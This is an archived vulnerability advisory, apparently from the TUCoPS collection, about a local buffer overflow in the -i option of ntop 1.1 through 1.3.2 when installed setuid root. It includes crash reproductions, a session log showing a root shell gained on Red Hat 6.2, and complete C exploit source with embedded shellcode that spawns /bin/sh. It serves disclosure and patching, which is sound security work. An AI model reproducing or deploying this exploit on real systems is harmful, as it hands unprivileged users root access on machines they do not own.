TUCoPS :: Unix :: General
:: ntop3-2.htm
Ntop Exploitable Buffer Overflow
Vulnerability
ntop
Affected
ntop 1.1, ntop 1.2.a7, ntop 1.3.1, ntop 1.3.2
Description
Christophe Bailleux found following. All ntop versions are
vulnerabled to local buffer overflow attack in there -i options.
Ntop must be owned by root with a setuid bit for the attacker to
gain root privileges.
a) ntop 1.1
tshaw:/home/cb/ntop-1.1/$ ./ntop -i `perl -e 'print "A"x208'`
ntop v.1.1 MT [i686-pc-linux-gnu] listening on AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Host Act -Rcvd- Sent TCP UDP ICMP
Segmentation fault
tshaw:/home/cb/SRCAUDIT/ntop-1.1$
b) ntop 1.2a7
tshaw:/home/cb/ntop-1.2a7$ ./ntop -i `perl -e 'print "A"x109'`
Segmentation fault
tshaw:/home/cb/SRCAUDIT/ntop-1.2a7$
c) ntop 1.3.1
tshaw:/home/cb/ntop-1.3.1$ ./ntop -i `perl -e 'print "A"x271'`
Segmentation fault
tshaw:/home/cb/SRCAUDIT/ntop-1.3.1$
d) ntop 1.3.2
tshaw:/home/cb/ntop-1.3.2$ ./ntop -i `perl -e 'print "A"x2835'`
24/Oct/2000:12:32:16 ntop v.1.3.2 MT [i686-pc-linux-gnu] (08/11/00 07:04:32 PM build)
24/Oct/2000:12:32:16 Listening on
[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
24/Oct/2000:12:32:16 Copyright 1998-2000 by Luca Deri <deri@ntop.org>
24/Oct/2000:12:32:16 Get the freshest ntop from http://www.ntop.org/
24/Oct/2000:12:32:16 Initialising...
Segmentation fault
tshaw:/home/cb/ntop-1.3.2$
Exploit was tested on redhat 6.2 (Zoot) where ntop is installed by
default with the bit setuid root
[cb@nux cb]$ cat /etc/redhat-release
Red Hat Linux release 6.2 (Zoot)
[cb@nux cb]$ rpm -qf /sbin/ntop
ntop-1.1-1
[cb@nux cb]$ id
uid=535(cb) gid=535(cb) groups=535(cb)
[cb@nux cb]$ ./expl
ntop v.1.1 MT [i586-pc-linux-gnu] listening on
..............................
Host Act -Rcvd- Sent TCP UDP ICMP
bash#
bash# id
uid=0(root) gid=535(cb) egid=3(sys) groups=535(cb)
bash# exit
[cb@nux cb]$
Exploit:
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#define LEN 208
int main (int argc, char **argv)
{
char buf[LEN + 12];
int ret = 0xbffffba0;
int *p;
char code[]=
"\x31\xdb\xb8\xb7\xaa\xaa\xaa\x25\xb7\x55\x55\x55\x53\x53\xcd\x80"
"\x31\xdb\xb8\x17\xaa\xaa\xaa\x25\x17\x55\x55\x55\x53\x53\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
if (argc> 1) {
ret += atoi(argv[1]);
fprintf(stderr, "Using ret %#010x\n", ret);
}
memset(buf, '\x90', LEN);
memcpy(buf + LEN - strlen(code), code, strlen(code));
p = (int *) (buf + LEN);
*p++ = ret;
*p++ = ret;
*p = 0;
execl("./ntop", "ntop", "-i", buf, NULL);
}
Solution
Upgrade to latest version.